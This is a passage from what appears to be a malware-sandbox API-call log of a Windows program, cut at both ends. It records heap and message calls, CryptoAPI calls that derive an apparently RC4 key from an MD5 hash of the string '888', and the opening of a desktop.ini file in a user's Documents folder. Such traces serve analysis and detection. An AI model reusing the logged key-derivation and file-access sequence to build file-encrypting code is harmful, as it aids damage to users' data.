hHeap=0x2af0000) returned 1 [0215.665] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0215.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0215.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8f0 | out: hHeap=0x2af0000) returned 1 [0215.666] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0215.666] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.666] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.666] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.666] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.666] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0215.666] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0215.666] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.666] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.666] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.666] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.666] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.666] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.666] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f7060, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0215.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0215.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7200, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0215.667] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c660) returned 1 [0215.667] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.667] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.667] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0215.668] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.668] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0215.668] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.668] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.668] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.668] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.668] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.668] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.668] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.668] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.668] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.668] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.668] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.668] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.668] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.668] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.668] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.668] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.668] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0215.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.668] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0215.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.668] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.669] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.669] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.669] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.669] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.669] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.669] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.669] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.669] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.669] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.669] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.669] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.669] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.669] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.669] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.669] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.669] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.669] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.669] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.670] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.670] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.670] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.670] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.670] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.670] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.670] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.670] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.670] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.670] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.670] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.670] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.670] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabc68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0215.670] CryptCreateHash (in: hProv=0xa7c660, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0215.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.670] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71f88, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.673] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0215.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71eb8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.673] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.673] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.674] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.674] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.674] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.674] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.674] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0215.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabb78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0215.674] CryptHashData (hHash=0x9e2238, pbData=0x2a71db8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0215.674] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.674] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.674] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.674] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.674] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.674] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.674] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.674] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.674] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.674] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.674] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.674] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.674] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.674] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0215.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabc08, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0215.675] CryptDeriveKey (in: hProv=0xa7c660, Algid=0x6601, hBaseData=0x9e2238, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1ab8) returned 1 [0215.675] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.675] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.675] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.675] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.675] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.675] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.675] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.675] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.675] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.675] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.675] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.675] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0215.675] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0215.675] CryptDestroyHash (hHash=0x9e2238) returned 1 [0215.675] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.675] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.676] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.676] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.676] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/desktop.ini" (normalized: "c:\\users\\fd1hvy\\documents\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x504 [0215.677] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0215.677] SetFilePointerEx (in: hFile=0x504, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0215.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6e80 [0215.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0215.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf90 | out: hHeap=0x2af0000) returned 1 [0215.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0215.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0215.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0215.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0215.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: 